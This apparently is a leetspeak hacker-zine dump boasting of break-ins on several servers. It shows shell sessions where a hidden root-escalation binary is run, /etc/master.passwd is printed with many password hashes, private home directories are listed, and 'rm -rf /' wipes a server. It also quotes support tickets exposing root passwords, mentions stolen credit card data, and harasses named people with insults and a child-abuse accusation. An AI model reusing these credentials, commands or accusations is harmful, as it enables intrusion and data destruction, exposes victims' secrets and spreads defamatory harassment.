-rwxr-xr-x 1 subz subz 2053659 Jan 2 2005 epic
drwxr-x--- 4 subz mail 512 Jun 7 2005 etc
-rw-r--r-- 1 subz subz 583 Jun 1 2005 htaccess.new
drwxrwx--- 4 subz mail 512 Dec 9 22:14 mail
-rwxr-xr-x 1 subz subz 20186 Nov 30 07:18 mix_nfo_backupAPR05.txt
drwxr-xr-x 4 subz subz 512 Jun 7 2005 public_ftp
drwxr-x--- 17 subz nobody 1024 Nov 23 20:20 public_html
-rwxr-xr-x 1 subz subz 106 Apr 14 2005 runbx
-rwxr-xr-x 1 subz subz 11 Apr 8 2005 s
-rw-r--r-- 1 subz nobody 47694645 Nov 23 20:07 ta11-23-05.zip
drwx------ 6 subz subz 1024 Aug 20 19:53 tmp
lrwxr-xr-x 1 subz subz 11 Aug 3 18:11 www -> public_html
drwxr-xr-x 2 subz subz 512 Jun 7 2005 x
sh-2.05b$ cat /home/subz/.ssh/known_hosts
xenin13.ath.cx ssh-dss AAAAB3NzaC1kc3MAAACBANG3OMhs6BTgTGNgezrI5hRX7U0aCdiCGWiN/L+QOlvAcokkAJvkEhbxOuc75yqDvc4grAkzftRDFYejnuPGnwe67Xx3MUyPRlY2ngReImDVb3Ntu2IofdgLB2za7jh9wpp8II6OV75VhyTptuDCKZfRmAQLRNXNMXbDaEoYmCuhAAAAFQD2IbUhcjvjTzs3Iv9po5qbt4DucQAAAIABgQtnRG8LRFMtwAUUYSwb7qG/ZhAYcAyvaTA0aEpzbaD5DuRJ2PYTgvgUiRY4lmZe1RmJagGFqSlFrxwDVUYNtq/quBTgGrakS7gZMqgfYmtErrbyiUuTNY3AT7Wcvsp0ylYM3a5MsNMZcWgldsx3lrQq+W1T6YtwWJ8bCdmZ3QAAAIEAz2MP2E1S8TLiKswE8mY+SrAYzxMTX9axeaianfCUg1yIapoU41pt6dGAWX7ZoxBTVBBxhH6g2GykRVVxW+4KnYv3tlKRPUfkxlGxc+RH9GoDTvKOkcGq5Pq4lRLV2eNn5mQZX4U8HzIS/zYLDbwjxtdp8VUo/8NfBDFc9HhLNE0=
dtmf.org ssh-dss AAAAB3NzaC1kc3MAAACBANDIY+onj2bx5ldh4N+NIuqCGjbNHw//AyNXZoal18f1G6oj3sZaKDu4QcNrKH0FOL6UAgSTcQbV1PSuK6yXwNWd1OATogckOhv1XCiqjZtiT4xXXZUosu0RK+MeCa5Gvba6rm5eeLP2vxDgXsc/3Mswv+vHyJYc15+abG3PUn9/AAAAFQCqnQUtUuyBSZ2vQdT7h33zDFGCewAAAIEAiDl7c1v2/MtkzPSQrhWfSdPZQ53QjgcNbo6Z9mxf2VMjygY/ESIJjZm61KEpG9VjPTb8D/9n+aozrgx9nV44VtlbLa/NW8IXLjJ8iKhbLNNVBzOkXJthP4nrMPMJSwhLizj1U78gwcjXOWErMruJLFqyW8nZSsrhWNDq9XXWIXUAAACBAJv+pNHpae6MN8x0rqw06tq1v6U08VasriIIfL4o4xtBD2uJM3wzCLZQ9Ff5LKqpgVPnC4UK7Heocc/VKZ1UOeF+cdMAAKTCc7JtqzaPoduwuI1mfer4qRwsbIAgA7ZoTCO5tW239XXcZAKTi/1vpPx+azzcXdogX9xX29UxmeLC
66.153.28.11 ssh-dss AAAAB3NzaC1kc3MAAACBANG3OMhs6BTgTGNgezrI5hRX7U0aCdiCGWiN/L+QOlvAcokkAJvkEhbxOuc75yqDvc4grAkzftRDFYejnuPGnwe67Xx3MUyPRlY2ngReImDVb3Ntu2IofdgLB2za7jh9wpp8II6OV75VhyTptuDCKZfRmAQLRNXNMXbDaEoYmCuhAAAAFQD2IbUhcjvjTzs3Iv9po5qbt4DucQAAAIABgQtnRG8LRFMtwAUUYSwb7qG/ZhAYcAyvaTA0aEpzbaD5DuRJ2PYTgvgUiRY4lmZe1RmJagGFqSlFrxwDVUYNtq/quBTgGrakS7gZMqgfYmtErrbyiUuTNY3AT7Wcvsp0ylYM3a5MsNMZcWgldsx3lrQq+W1T6YtwWJ8bCdmZ3QAAAIEAz2MP2E1S8TLiKswE8mY+SrAYzxMTX9axeaianfCUg1yIapoU41pt6dGAWX7ZoxBTVBBxhH6g2GykRVVxW+4KnYv3tlKRPUfkxlGxc+RH9GoDTvKOkcGq5Pq4lRLV2eNn5mQZX4U8HzIS/zYLDbwjxtdp8VUo/8NfBDFc9HhLNE0=
sh-2.05b$ /.h1dd3nw4r3z/h00ps root
sh-2.05b$ cat /etc/master.passwd
# $FreeBSD: src/etc/master.passwd,v 1.39 2004/08/01 21:33:47 markm Exp $
#
root:$1$JYAINdtj$UKfR4djpEuvg0cmcIzaX1/:0:0::0:0:Charlie &:/root:/bin/csh
toor:*:0:0::0:0:Bourne-again Superuser:/root:
daemon:*LOCKED**:1:1::0:0:Owner of many system processes:/root:/usr/sbin/nologin
operator:*:2:5::0:0:System &:/:/usr/sbin/nologin
bin:*:3:7::0:0:Binaries Commands and Source:/:/usr/sbin/nologin
tty:*:4:65533::0:0:Tty Sandbox:/:/usr/sbin/nologin
kmem:*:5:65533::0:0:KMem Sandbox:/:/usr/sbin/nologin
games:*:7:13::0:0:Games pseudo-user:/usr/games:/usr/sbin/nologin
news:*:8:8::0:0:News Subsystem:/:/usr/sbin/nologin
man:*:9:9::0:0:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
sshd:*:22:22::0:0:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
smmsp:*:25:25::0:0:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin
mailnull:*:26:26::0:0:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin
bind:*:53:53::0:0:Bind Sandbox:/:/usr/sbin/nologin
proxy:*:62:62::0:0:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin
_pflogd:*:64:64::0:0:pflogd privsep user:/var/empty:/usr/sbin/nologin
uucp:*:66:66::0:0:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico
pop:*:68:6::0:0:Post Office Owner:/nonexistent:/usr/sbin/nologin
www:*:80:80::0:0:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
nobody:*:65534:65534::0:0:Unprivileged user:/nonexistent:/usr/sbin/nologin
admin:$1$2e0zfCsz$lAQjvdjekuhSlsq8t6EW8/:1001:0::0:0:User &:/home/admin:/bin/sh
mysql:*:88:88::0:0:MySQL Daemon:/nonexistent:/sbin/nologin
proftpd:*:1002:1001::0:0:User &:/home/proftpd:/bin/sh
cpanel:*:1003:1004::0:0::/usr/local/cpanel:/usr/local/bin/bash
ftp:*:1004:1005::0:0::/home/ftp:/usr/local/bin/bash
mailman:*:1005:1006::0:0::/usr/local/cpanel/3rdparty/mailman:/usr/local/bin/bash
jservers:$1$hIdAePQU$ksZM8EzbY7ChFz/7/U1Dh1:1007:1008::0:0:User &:/usr/home/jservers:/usr/local/cpanel/bin/jailshell
scam:$1$Ang02Mgv$cKuTOfYcYWf6qHHswRwlH/:1009:1010::0:0:User &:/usr/home/scam:/usr/local/bin/bash
rastack:$1$AhAoXm5W$9N5E3YEctK8ew/gfHdq6d0:1010:1011::0:0:User &:/usr/home/rastack:/usr/local/cpanel/bin/jailshell
subz:$1$rcmDfNKD$uj2X1G9wRAyLcmXwcKNcu.:1011:1012::0:0:User &:/usr/home/subz:/usr/local/cpanel/bin/jailshell
di0ad:$1$FrvNOHfO$IBXXix0r2Crs5YK9ewIbL/:1014:1015::0:0:Joe Bobba:/home/di0ad:/usr/local/bin/bash
gonbeirc:$1$kW3TozN2$y56PFVfrSOoA45OOnJV1z1:1015:1016::0:0:User &:/usr/home/gonbeirc:/usr/local/bin/bash
clamav:*LOCKED*P5FiQr94d85ls:1006:1007::0:0::/usr/local/clamav:/bin/false
nemo9:$1$.Vr27464$dtbeVh8b7Hy/E2cOzzz6K0:1018:1019::0:0:User &:/usr/home/nemo9:/usr/local/cpanel/bin/noshell
rdx:$1$6fj8JKdX$RGGah1KO/Nx.fY0w37Cle0:1019:1020::0:0:User &:/usr/home/rdx:/usr/local/cpanel/bin/jailshell
currency:$1$HFXvkm.1$Gjb2L6gBhcL0JIMYRJ7yT0:1020:1021::0:0:User &:/usr/home/currency:/usr/local/cpanel/bin/jailshell
w0ah:$1$tiDCS/51$BrkBishBD4mbEL6mPYOBJ0:1022:1023::0:0:User &:/usr/home/w0ah:/usr/local/cpanel/bin/noshell
whoresr:$1$ovwvMAz1$S5I.MQD2S4DkTqolZlTEG1:1024:1025::0:0:User &:/usr/home/whoresr:/usr/local/cpanel/bin/jailshell
krnlkrash:$1$1em0Vib5$VoKSjk4T8iLF7DEgQD.2w1:1025:1026::0:0:Doug Jones:/home/krnlkrash:/usr/local/bin/bash
sh-2.05b$ ls -al /root
total 429368
d-wx--x--x 19 root wheel 1024 Dec 12 03:28 .
drwxr-xr-x 24 root wheel 1024 Aug 30 03:00 ..
-rw------- 1 root wheel 957 Aug 14 00:30 .accesshash
drwxr-xr-x 3 root wheel 512 Sep 15 03:04 .cpan
drwxr-xr-x 3 root wheel 512 Aug 22 03:06 .cpanplus
drwx------ 3 root wheel 512 Dec 12 03:24 .cpbsdpkgs
drwx------ 3 root wheel 512 Dec 12 03:28 .cpcpan
-rw-r--r-- 2 root wheel 801 May 1 2005 .cshrc
-rw-r--r-- 1 root wheel 20 Aug 3 04:04 .forward
drwx------ 2 root wheel 512 Dec 4 03:12 .gnupg
-rw------- 1 root wheel 2538 Dec 10 06:01 .history
drwx------ 2 root wheel 512 Aug 9 05:38 .john
-rw-r--r-- 1 root wheel 143 May 1 2005 .k5login
-rw-r--r-- 1 root wheel 293 May 1 2005 .login
-rw------- 1 root wheel 40 Aug 3 17:13 .my.cnf
-rw------- 1 root wheel 108 Aug 3 17:13 .mysql_history
-rw-r--r-- 2 root wheel 251 May 1 2005 .profile
-rw------- 1 root wheel 1024 Dec 12 03:31 .rnd
drwx------ 2 root wheel 512 Dec 12 03:00 .spamassassin
drwx------ 2 root wheel 512 Aug 2 19:52 .ssh
-rw-r--r-- 1 root wheel 9971 Aug 2 18:24 CORE
-rw-r--r-- 1 root wheel 1292 Aug 14 20:58 awstats.pl
drwxr-xr-x 4 root wheel 512 Aug 2 21:43 cpanel3-skel
drwx------ 4 root wheel 512 Aug 20 08:20 cprestore
drwx--x--x 25 di0ad rastack 2048 Jun 10 2005 di0ad
-rw-r--r-- 1 root wheel 80203532 Aug 2 20:32 di0ad.tgz
-rw-r--r-- 1 root wheel 18401483 Aug 3 03:34 dirs.tgz
drwxr-xr-x 28 root wheel 3584 Jun 10 2005 etc
-rw-r--r-- 1 root wheel 345475 Aug 3 03:35 etc.tgz
-rw-r--r-- 1 root wheel 30295 Aug 3 03:34 files.tgz
drwxrwx--- 2 daemon 12 512 Aug 2 21:28 mail
-rwxr-xr-x 1 root wheel 10785 Aug 7 23:39 metasploit-autoscan-plugin.tar.gz
-rw-r--r-- 1 root wheel 0 Aug 3 17:06 mysqlaccess.log
drwxr-xr-x 5 root wheel 512 Aug 17 06:57 ownage
-r--r--r-- 1 root wheel 3893 Aug 2 03:13 ports-supfile
drwxr-xr-x 15 root wheel 1024 Jun 10 2005 root
-rw-r--r-- 1 root wheel 1173105 Aug 2 20:31 root.tgz
-r--r--r-- 1 root wheel 3989 Aug 2 04:33 stable-supfile
drwxr-xr-x 2 root wheel 512 Aug 9 05:37 test
drwxr-xr-x 3 jservers clamav 512 Aug 14 15:19 unfz
-rw-r--r-- 1 root wheel 119330992 Aug 2 20:34 unfz.tgz
sh-2.05b$
ps. w1th 4ll th4t cr3d1t c4rd 1nf0 y0u g0t d0nt y0u th1nk y0u sh0uld p3rh4pz
k33p y0ur r34l n4m3 0ut 0f y0ur m41l sp00lz? 3y3 kn0w 3ncrypt10n 1snt f0r
3l1t3 h4ck3rz l1k3 y0u & J3r3my.
pps. y0u kn0w ph4s3d just h4ngz 4r0und y0u s0 y0u'll t4k3 th3 f4ll wh3n h3
g3tz bust3d.. but y0u'r3 t00 stud1d t0 s33 th4t.
ppps. w3 d3c1d3d t0 h3lp y0u 0ut 4nd 3r4s3 th4t st0ld3n CC 1nf0rm4t10n
fr0m y0ur b0x. n0 n33d t0 th4nk us..
sh-2.05b$ /.h1dd3nw4r3z/h00ps root
sh-2.05b$ rm -rf /
l0l@th1z fr0m h1z h0zt'z supp0rt s1t3..
-~-~-~
need new hard drive
Created On:July 18, 2006 1:08am CDT
Department:OS Reinstall
Priority:High
Posted by FDCservers Support (Staff)
This helpdesk is only meant for reboots, reinstalls, hardware problems, reverse
dns and connectivity issues only. FDCServers does not provide managed services
at this time, unfortunately. We provide no support in configuration of any
software packages.
You may try our forums for support with this issue.
-FDCservers
-FDCservers
Date: 07-18-2006 2:40pm CDT
Posted by Paul ******
how do I mount the old hdd?
Date: 07-18-2006 1:25pm CDT
Posted by FDCservers Support (Staff)
os reinstalled
cpanel installing now
admin / newbox
root / newbox
old drive hooked up as secondary.
-fdc
-FDCservers
-~-~-~
th4nkz f0r th3 p4zz
h3r3 1z 4n0th3r t1ck3t s00n 4ft3r th3 pr3v10uz 0n3.
-~-~-~
reboot plz
Created On:July 17, 2006 12:22am CDT
Department:Reboot request
Priority:High
Posted by FDCservers Support (Staff)
it looks like your hard drive is bad and needs to be replaced. please open a
reinstall ticket letting us know what OS to install, and ask for a new drive.
-FDCservers
Date: 07-17-2006 12:46am CDT
Posted by Paul ******
still offline
:\
Date: 07-17-2006 12:41am CDT
Posted by Paul ******
root/j4g3r6!
Date: 07-17-2006 12:33am CDT
Posted by FDCservers Support (Staff)
Your server has been rebooted. Please wait 5-10 minutes for the server to come
back up. Please reopen this ticket and provide login information for this server
if it does not come back online.
-~-~-~
th3 hdd w0rk3d juzt f1n3 dur1ng th3 rm -rf / I w0nder wh4t th3 pr0bl3m c0uld
b3???! r u p1zz3d di0ad?? b3 gr4t3ful w3 d1dnt put y0ur d0rky m41lsp00lz w/ y0ur
m0m 1n h3r3. h4r h4r h4r.sh3 s0undz l1k3 a r34l b1tch! y0ur f4m1ly 1z 1ns4n3
do0d!!
22.txt -~-~-~ 0wlm4n4tt r3s1gnz
0wlm4n 1z l4m3. h3 g0t 0wn3d b3c4uz3 h3 w4z 4 c0r3 m3mb3r 0f n1xs3c (fuck1ng
l4m3). h3 m4k3z n30p3t-l1k3 g4m3z w1th h1z r3m3d14l php sk1llz. w3 h4v3 4
f33l1ng th1z l0z3r 3v3n suppl13z rl0xl3y w1th 4ll th3 ch1ld p0rn!$#%# 0wlm4n
c0nt4ntly b1tch3z ab0ut sh1t 1n h1z ch4nn3l #n3twh0r3z (k3y = glucose). d0 n0t
st3p 0n h1z t3rr1t0ry, h3'z a f3r0c10uz b34zt, 4nd w1ll 4tt3mpt t0 sk00l y0u 1n
php kn0wl3dg3. h0w l4m3 1z th1z k1d 3xaktly? 0n 4 sk4l3 0f 1 t0 10 (1 b31ng th3
l3azt l4m3): 8. pr3tty fuck1n l4m3 1f y0u 4zk m3. wh4t k1nd 0f n4m3 1z 0wlm4n4tt
4nyw4yz?
# ssh -l owlmanatt bell
owlmanatt@bell's password:
Last login: Wed Nov 30 00:57:14 2005 from localhost.localdomain
Linux bell 2.6.12-10-386 #1 Fri Nov 18 11:51:02 UTC 2005 i686 GNU/Linux
OwlManAtt or a highly-trusted user!
^
--- h0h0h0
Please do not use this box and/or connection to violate any law.
I will hunt your ass down and kick it if you do.
^
--- ./h0no-dd0z-b3ta98.9-v3rs10n89 -h fbi.gov
owlmanatt@bell:~$ uname -a;id
Linux bell 2.6.12-10-386 #1 Fri Nov 18 11:51:02 UTC 2005 i686 GNU/Linux <-- 0h mY g0d g00d th1nG w3 st0l3 th0z3 k3rn3l 0dayz fR0M SD h0h0
uid=1000(owlmanatt) gid=1000(owlmanatt) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),107(lpadmin),108(scanner),109(admin),1000(owlmanatt)
owlmanatt@bell:~$ w
17:37:26 up 1 day, 18:56, 1 user, load average: 1.35, 1.20, 1.11
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
owlmanat :0 - Tue22 ?xdm? 41:58m 1.52s x-session-manager <- th3 l4m3r 1z 3v3n 0n wh1le w3 h4xx0r h1m 101!!
owlmanatt@bell:~$ ls -al /home/
total 76
drwxr-xr-x 7 root root 4096 Jul 18 18:47 .
drwxr-xr-x 22 owlmanatt owlmanatt 4096 Nov 23 21:21 ..
drwx------ 3 cvsd cvsd 4096 Jul 18 18:49 cvsd
drwxr-xr-x 2 root root 49152 Sep 12 2004 lost+found
drwx------ 138 owlmanatt owlmanatt 8192 Nov 30 21:32 owlmanatt
drwx------ 3 steve staff 4096 Jan 16 2005 scrap
drwxr-xr-x 2 steve users 4096 May 20 2005 steve
owlmanatt@bell:~$ ls -al /home/owlmanatt/*
-rw-r--r-- 1 owlmanatt owlmanatt 162 Sep 14 20:51 /home/owlmanatt/101.php
-rw-r--r-- 1 owlmanatt owlmanatt 24650585 Aug 4 19:07 /home/owlmanatt/3_Unix_geeks_harass_CS_Fag_(peeperz).mp3
-rw-r--r-- 1 owlmanatt owlmanatt 0 Jul 2 00:34 /home/owlmanatt/BLOCKCAM
-rw-r--r-- 1 owlmanatt owlmanatt 2801668 Oct 28 21:05 /home/owlmanatt/Bon Jovi- You Give Love a Bad Name.mp3
-rw-r--r-- 1 owlmanatt owlmanatt 7415404 Mar 29 2005 /home/owlmanatt/CEDEGA-1.4.2.tar.gz
-rw-r--r-- 1 owlmanatt owlmanatt 333230 Aug 10 08:04 /home/owlmanatt/Drivey013.exe
-rw-r--r-- 1 owlmanatt owlmanatt 987981 Aug 29 21:55 /home/owlmanatt/Equipets_Mazipets.zip
-rw-r--r-- 1 owlmanatt owlmanatt 44 Aug 27 17:21 /home/owlmanatt/HISTORIAN.txt
-rw-r--r-- 1 owlmanatt owlmanatt 1377924 Sep 18 10:02 /home/owlmanatt/MT-3.2.tar.gz
-rw-r--r-- 1 owlmanatt owlmanatt 312 Nov 19 22:59 /home/owlmanatt/MYSQL_PASSWORDS.txt
-rw-r--r-- 1 owlmanatt owlmanatt 106 Sep 5 08:33 /home/owlmanatt/NO
lrwxrwxrwx 1 owlmanatt owlmanatt 36 Mar 29 2005 /home/owlmanatt/TransGaming_Drive -> /home/owlmanatt/.transgaming/c_drive
-rw-r--r-- 1 owlmanatt owlmanatt 15037045 Aug 22 20:32 /home/owlmanatt/WeHateTechEp13.mp3
-rw-r--r-- 1 owlmanatt owlmanatt 3082577 Oct 31 20:43 /home/owlmanatt/Wind's Nocturne.mp3
-rw-r--r-- 1 owlmanatt owlmanatt 3251 Nov 28 2004 /home/owlmanatt/about.php~
-rw-r--r-- 1 owlmanatt owlmanatt 1661 Nov 20 02:02 /home/owlmanatt/alexandria_sql.sql
-rw-r--r-- 1 owlmanatt owlmanatt 15850 Nov 20 01:54 /home/owlmanatt/authors.sql
-rw-r--r-- 1 owlmanatt owlmanatt 4956 Nov 19 23:48 /home/owlmanatt/authors_raw.csv
-rw-r--r-- 1 owlmanatt owlmanatt 1956216 Oct 22 21:05 /home/owlmanatt/bash-2.05b.tar.gz
-rw-r--r-- 1 owlmanatt owlmanatt 8801 Oct 29 15:43 /home/owlmanatt/career_paths.sql
-rw-r--r-- 1 owlmanatt owlmanatt 341939 Nov 13 22:28 /home/owlmanatt/certificate_reverend.png
-rw-r--r-- 1 owlmanatt owlmanatt 1006 Oct 21 20:42 /home/owlmanatt/checklist.yxy
-rw-r--r-- 1 owlmanatt owlmanatt 393941 Aug 16 18:08 /home/owlmanatt/cj.tar.gz
-rw-r--r-- 1 owlmanatt owlmanatt 18436 Oct 29 14:23 /home/owlmanatt/codes.txt
-rw-r--r-- 1 owlmanatt owlmanatt 18423 Oct 29 14:55 /home/owlmanatt/country.sql
-rw-r--r-- 1 owlmanatt owlmanatt 11054 Sep 5 23:26 /home/owlmanatt/cpvr.html
-rw-r--r-- 1 owlmanatt owlmanatt 11054 Sep 5 23:26 /home/owlmanatt/cpvr.html~
-rw-r--r-- 1 owlmanatt owlmanatt 27042 Sep 5 23:21 /home/owlmanatt/cpvr_exposed.abw
-rw-r--r-- 1 owlmanatt owlmanatt 8869 Sep 4 09:03 /home/owlmanatt/cpvr_exposed.html
-rw-r--r-- 1 owlmanatt owlmanatt 10295 Sep 4 09:03 /home/owlmanatt/cpvr_exposed.html~
-rw-r--r-- 1 owlmanatt owlmanatt 65 Jul 28 23:42 /home/owlmanatt/cybit.pw
-rw-r--r-- 1 owlmanatt owlmanatt 264 Sep 5 17:13 /home/owlmanatt/cybit_sql.txt
-rw-r--r-- 1 owlmanatt owlmanatt 4344 Jul 14 23:59 /home/owlmanatt/cybitures.dia~
-rw-r--r-- 1 owlmanatt owlmanatt 2324955 Nov 24 10:20 /home/owlmanatt/database_backup.sql
-rw-r--r-- 1 owlmanatt owlmanatt 103 Aug 14 20:40 /home/owlmanatt/emailaddress
-rw-r--r-- 1 owlmanatt owlmanatt 22866 Sep 29 23:03 /home/owlmanatt/english.php
-rw-r--r-- 1 owlmanatt owlmanatt 9 Nov 28 23:01 /home/owlmanatt/festival
-rw-r--r-- 1 owlmanatt owlmanatt 7 Oct 8 21:52 /home/owlmanatt/figlet
-rw-r--r-- 1 owlmanatt owlmanatt 12886 Dec 31 2004 /home/owlmanatt/functions.inc.php~
-rw-r--r-- 1 owlmanatt owlmanatt 1816 Nov 20 08:24 /home/owlmanatt/genre.sql
-rw-r--r-- 1 owlmanatt owlmanatt 4737 Feb 19 2005 /home/owlmanatt/grue.php
-rwxr-xr-x 1 owlmanatt owlmanatt 7101 Nov 28 22:30 /home/owlmanatt/hello
-rw-r--r-- 1 owlmanatt owlmanatt 445 Nov 28 22:30 /home/owlmanatt/hello.c
-rw-r--r-- 1 owlmanatt owlmanatt 5445722 Jul 19 22:01 /home/owlmanatt/inkscape_0.41-5_i386.deb
-rw-r--r-- 1 owlmanatt owlmanatt 169 Sep 4 12:29 /home/owlmanatt/laura_2005-09-04.txt
-rw-r--r-- 1 owlmanatt owlmanatt 45788 Sep 27 20:15 /home/owlmanatt/leg-picture.com
-rw------- 1 owlmanatt owlmanatt 3211 Nov 30 00:30 /home/owlmanatt/mbox
-rw-r--r-- 1 owlmanatt owlmanatt 33 Oct 29 19:48 /home/owlmanatt/md5.php
-rw-r--r-- 1 owlmanatt owlmanatt 20030 Nov 22 22:29 /home/owlmanatt/metar.php
-rw-r--r-- 1 owlmanatt owlmanatt 20071 Nov 1 19:49 /home/owlmanatt/mindwar.doc
-rw-r--r-- 1 owlmanatt owlmanatt 449 Oct 22 22:20 /home/owlmanatt/minicom.log
-rwxr-xr-x 1 owlmanatt owlmanatt 11034 Jul 23 13:34 /home/owlmanatt/mirrorselect
-rwxr-xr-x 1 owlmanatt owlmanatt 2496 Aug 16 18:10 /home/owlmanatt/mkthumb.sh
-rw-r--r-- 1 owlmanatt owlmanatt 3146 Dec 29 2004 /home/owlmanatt/music.
-rw-r--r-- 1 owlmanatt owlmanatt 5437 Nov 19 10:39 /home/owlmanatt/music.pls
-rw-r--r-- 1 owlmanatt owlmanatt 1821 Aug 19 08:26 /home/owlmanatt/owl_client.php
-rw-r--r-- 1 owlmanatt owlmanatt 2576 Aug 19 08:26 /home/owlmanatt/owl_client.php~
-rw-r--r-- 1 owlmanatt owlmanatt 1670 Aug 18 22:02 /home/owlmanatt/owl_inf.php
-rw-r--r-- 1 owlmanatt owlmanatt 1684 Aug 18 22:02 /home/owlmanatt/owl_inf.php~
-rw-r--r-- 1 owlmanatt owlmanatt 170484 Nov 20 02:02 /home/owlmanatt/owl_library.sql
-rw-r--r-- 1 owlmanatt owlmanatt 6859 Oct 30 00:22 /home/owlmanatt/owldb.sql.gz
-rw-r--r-- 1 owlmanatt owlmanatt 441913 Aug 27 17:05 /home/owlmanatt/owlmanat_wrdp1.sql
-rw-r--r-- 1 owlmanatt owlmanatt 8155 Nov 27 19:08 /home/owlmanatt/pet_greats.abw
-rw-r--r-- 1 owlmanatt owlmanatt 6549 Nov 27 19:11 /home/owlmanatt/pet_greats.html
-rw-r--r-- 1 owlmanatt owlmanatt 1158 Oct 16 17:10 /home/owlmanatt/phil_radio.aup
-rw-r--r-- 1 owlmanatt owlmanatt 1158 Oct 16 16:59 /home/owlmanatt/phil_radio.aup~
-rw-r--r-- 1 owlmanatt owlmanatt 433196 Oct 16 17:10 /home/owlmanatt/phil_radio.wav
-rw-r--r-- 1 owlmanatt owlmanatt 170593 Oct 2 22:17 /home/owlmanatt/pic1253.com
-rw-r--r-- 1 owlmanatt owlmanatt 5825 Nov 20 01:43 /home/owlmanatt/publishers.sql
-rw-r--r-- 1 owlmanatt owlmanatt 376832 Sep 25 2004 /home/owlmanatt/putty.exe
-rw-r--r-- 1 owlmanatt owlmanatt 31036 Nov 13 22:23 /home/owlmanatt/reverend_credential.gif
-rw-r--r-- 1 owlmanatt owlmanatt 7304 Nov 27 10:20 /home/owlmanatt/revo.txt
-rwxr-xr-x 1 owlmanatt owlmanatt 10272 Aug 18 07:16 /home/owlmanatt/rlytest
-rw-r--r-- 1 owlmanatt owlmanatt 191 Oct 26 22:14 /home/owlmanatt/scale.sh
-rw-r--r-- 1 owlmanatt owlmanatt 10167 Sep 4 23:00 /home/owlmanatt/shit.txt
-rw-r--r-- 1 owlmanatt owlmanatt 7906384 Oct 25 10:35 /home/owlmanatt/skype_1.2.0.18-1_i386.deb
-rw-r--r-- 1 owlmanatt owlmanatt 23 Oct 23 20:22 /home/owlmanatt/soponica.txt
-rw-r--r-- 1 owlmanatt owlmanatt 949226 Sep 4 12:37 /home/owlmanatt/spybotsd_includes.exe
-rw-r--r-- 1 owlmanatt owlmanatt 65 Jul 28 23:25 /home/owlmanatt/tigress.contact
-rw-r--r-- 1 owlmanatt owlmanatt 442 Nov 26 20:46 /home/owlmanatt/tmp.txt
-rw-r--r-- 1 owlmanatt owlmanatt 51122 Oct 30 00:21 /home/owlmanatt/uber_wp.sql.gz
-rw-r--r-- 1 root root 374 Jul 28 21:02 /home/owlmanatt/uninstalldirs
-rwxr-xr-x 1 owlmanatt owlmanatt 416 Jun 27 01:44 /home/owlmanatt/webcamcheck.sh
-rw-r--r-- 1 owlmanatt owlmanatt 893 Jun 19 16:22 /home/owlmanatt/windfis2.mid
-rwxr-xr-x 1 owlmanatt owlmanatt 835 Jul 10 00:33 /home/owlmanatt/wp-config.php
-~-~ S0ME D1R3KT0R13Z H4V3 B33N SN1PP3D DU3 T0 TH3M B31NG B0R1NG/IRR3L3V4NT -~-~
/home/owlmanatt/archives:
total 543356
drwxr-xr-x 9 owlmanatt owlmanatt 4096 Oct 25 23:47 .
drwx------ 138 owlmanatt owlmanatt 8192 Nov 30 21:32 ..
-rw-r--r-- 1 owlmanatt owlmanatt 655146 Oct 25 23:47 2005-10-25_owlmanat-wrdp1.sql
-rw-r--r-- 1 owlmanatt owlmanatt 8855552 Oct 3 2004 Comp04.zip
drwxr-xr-x 3 owlmanatt owlmanatt 4096 Jun 27 19:11 Evanion Tmp
-rw-r--r-- 1 owlmanatt owlmanatt 305652 Sep 21 2004 ExpenseManager_v02.zip
-rw-r--r-- 1 owlmanatt owlmanatt 51843 Dec 3 2004 Handling GUI Access with X and VNC Servers.zip
-rw-r--r-- 1 owlmanatt owlmanatt 16453 Jun 16 2004 Hosting.zip
-rw-r--r-- 1 owlmanatt owlmanatt 768234 Jun 19 2004 Jordan.zip
drwxr-xr-x 9 owlmanatt owlmanatt 4096 Jul 13 19:13 Neorus Tmp
drwxr-xr-x 2 owlmanatt owlmanatt 4096 Aug 13 14:34 Omnir
-rw-r--r-- 1 owlmanatt owlmanatt 16079193 Oct 3 2004 USBV258.zip
-rw------- 1 owlmanatt owlmanatt 28661659 Jul 12 21:55 backup-7.13.2004_15-19-55_owlmanat.tar.gz
-rw------- 1 owlmanatt owlmanatt 55882852 Jul 16 08:09 backup-7.16.2005_06-49-43_owlmanat.tar.gz
-rw------- 1 owlmanatt owlmanatt 140971010 Aug 4 2004 backup-8.4.2004_12-14-35_jordank.tar.gz
drwxr-xr-x 5 owlmanatt owlmanatt 4096 Sep 7 21:02 backup.cybit
drwxr-xr-x 5 owlmanatt owlmanatt 4096 Jul 9 11:21 backup.prof
drwxr-xr-- 7 owlmanatt owlmanatt 4096 Jul 9 16:01 betta
-rw-r--r-- 1 owlmanatt owlmanatt 2831461 Dec 10 2004 bl3-32fd.zip
-rw-r--r-- 1 owlmanatt owlmanatt 592046 Oct 17 2004 bootitng.zip
-rw-r--r-- 1 owlmanatt owlmanatt 284405 Nov 18 2004 chizzy.tar.gz
-rw-r--r-- 1 owlmanatt owlmanatt 2793257 Oct 16 2004 coldfire_03.tar.bz
-rw-r--r-- 1 owlmanatt owlmanatt 656506 Jan 25 2005 dtrace.tar.gz
-rw-r--r-- 1 owlmanatt owlmanatt 31924847 Jul 23 11:25 el_101.zip
-rw-r--r-- 1 owlmanatt owlmanatt 275748 Nov 9 2004 enigmail-0.89.0-tb-linux.xpi
-rw-r--r-- 1 owlmanatt owlmanatt 276799 Dec 7 2004 enigmail-0.89.5-tb-linux.xpi
-rw-r--r-- 1 owlmanatt owlmanatt 100610 Dec 16 2004 gaim-otr_1.0.1-1_i386.deb
-rw-r--r-- 1 owlmanatt owlmanatt 15036 Dec 20 2004 gaim-xmms-remote_1.7-2_i386.deb
-rw-r--r-- 1 owlmanatt owlmanatt 197578 Jan 22 2005 hpna_2_0_linux_beta_drivers.tar.gz
-rw-r--r-- 1 owlmanatt owlmanatt 218561829 Sep 20 2004 kato_backup.tar.gz
-rw-r--r-- 1 owlmanatt owlmanatt 7854080 Apr 20 2004 logs.tar
